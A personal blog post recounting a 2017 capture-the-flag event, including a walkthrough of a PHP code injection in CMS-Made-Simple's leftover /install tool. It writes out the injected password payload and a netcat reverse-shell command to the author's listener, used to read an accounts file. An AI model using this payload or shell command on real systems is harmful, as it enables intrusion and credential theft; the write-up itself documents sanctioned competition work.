A wonderful day at CTF036 2017

2017-03-31 22:40:00

Today was a blast! In what has become an annual tradition, Ultimum organised the third edition of their CTF036 event.

A big change since last year: I started the day not by listening, but by talking! I presented the “My first RH hack” talk, which I’d given last year at IT Gilde. In it, I outlined what I’d learned hacking the Kerui alarm system. The slides to my presentation can be found here.

Reactions from the attendants were generally positive: apparently my presentation style was well-received and I’d matched the content’s level to that of the crowd. I was followed by John Kroon, who detailed a vulnerability assessment framework he’d built and Sijmen Ruwhof. The latter has recently gained some fame with his public outcry regarding the Dutch voting process and the software involved. It’s quite the kerfuffle!

The CTF was quite a challenge! Like last year we were presented with an A4 sized description of the target, which basically hinted at a domainname, a mail server and a DNS server. After some initial confusion about IP ranges, I got off to a start. DNSenum confirmed three hosts in one network, with two others in a deeper subnet. The three servers out in the open are respectively a web server, the mail server and a Windows host with data shares.

Like last year, I started with the web server. This runs CMS-Made-Simple v1.1.2. Sploitsearch did not list anything that seemed immediately useful, but Nikto did show me that various useful subdirs were found, including /admin and /install. John’s colleague Jordy quickly found something interesting, which relies upon /install not being deleted: CMS-MS PHP Code Injection vulnerability.

By this time a few competitors had discovered something I’d missed: the Windows box had a freely accessible share with three of the sought-after accounts, worth 30 points. Of the twenty-odd competitors, three had 30 points within the first hour.

John and I continued poking at Jordy’s suggestion, with Rik across the tables following suit. I was the first to get it to work, after Jordy spurred me on. The basic process was indeed as outlined in the linked article:

1. Setup MySQL on my own sytem.
2. Make a random, empty database and grant a new account (e.g. “test”) full access to the database.
3. The password to the user account must be: ‘.passthru($_GET[‘command’]);exit;//
4. The database must be accessible remotely (change mysql.cnf and use the appropriate GRANT, more info here).
5. At this point you use the setup tool in /install to point CMS-MS at your own database. Uncheck the boxes in step #4.
6. Once you’ve finished the setup tool, the config.php file contains the password above, which enables you to call the base URL with an added “?command=” where you can enter any arbitrary command for the host OS.
7. I quickly found that the target host had /bin/netcat installed, so I could run http://www.thesmartcloud.nl/?command=/bin/netcat -e /bin/bash 172.100.23.74 443
8. This connects to my listening netcat on my port 443. Ace!

Netcat gave me a shell as user “www-data”. Poking around the host I found no abusable SUID executables, no sudo rules and no obvious methods for privesc. I did manage to grab /home/accounts.txt which contains seven accounts. Thus, for about half an hour, I was in the gleeful position of being 1st with 70 points 😀

While I kept poking at the web server and later moved on to the RoundCube/Dovecot box, I also helped John and Rik while they tried to get the CMS-MS exploit to work. Word got around quickly and a few of the guys who already had 30pts moved up to 100, with about 40mins left. I tried hard, but I couldn’t find a way to score more points, so I ended up in 5th place today.

Ultimum’s Michael informed us that the maximum score attainable was 500pts, so basically none of us had scratched beyond the surface by 16:00. As I said: they made it quite the challenge! It was a lot of fun!

Source: Thomas’ personal website: https://www.kilala.nl/index.php?id=2389